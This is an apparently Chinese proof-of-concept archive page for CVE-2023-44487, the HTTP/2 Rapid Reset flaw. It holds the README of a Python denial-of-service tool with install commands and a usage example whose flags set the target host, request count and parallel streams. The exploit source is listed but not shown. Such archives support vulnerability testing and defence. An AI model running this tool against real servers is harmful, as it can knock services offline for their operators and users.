关联漏洞
标题:
Apache HTTP/2 资源管理错误漏洞
(CVE-2023-44487)
描述:HTTP/2是超文本传输协议的第二版,主要用于保证客户机与服务器之间的通信。 Apache HTTP/2存在安全漏洞。攻击者利用该漏洞导致系统拒绝服务。以下产品和版本受到影响:.NET 6.0,ASP.NET Core 6.0,.NET 7.0,Microsoft Visual Studio 2022 version 17.2,Microsoft Visual Studio 2022 version 17.4,Microsoft Visual Studio 2022 version 17.6,Micros
描述
A python based exploit to test out rapid reset attack (CVE-2023-44487)
介绍
# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
# Exploit:
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
## Table of Contents
- [Installation](#installation)
- [Usage](#usage)
## Installation
Clone the repository to your local machine using Git, install poetry, and run the program:
```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487
# install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -
# poetry install
poetry install
# Activate the virtual environment created by Poetry:
poetry shell
# Run Help
python main.py
## Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2
```
## Usage
Usage: main.py [OPTIONS]
```bash
Options:
--host TEXT Host URL [required]
--path TEXT Path on the host [required]
--headers TEXT Headers (comma-separated) [required]
--port INTEGER Port number [required]
--requests_count INTEGER Number of requests to be sent [required]
--max_streams INTEGER Maximum streams to be opened in parallel
[required]
--parallel_connections INTEGER Number of parallel connections to be made
with the server. (TCP connection)
[required]
--help Show this message and exit.
```
文件快照
[4.0K] /data/pocs/41804f685791039b5c9ff5b34dd135bf42c365c5
├── [ 11K] LICENSE
├── [8.6K] main.py
├── [ 35K] poetry.lock
├── [ 393] pyproject.toml
└── [1.7K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。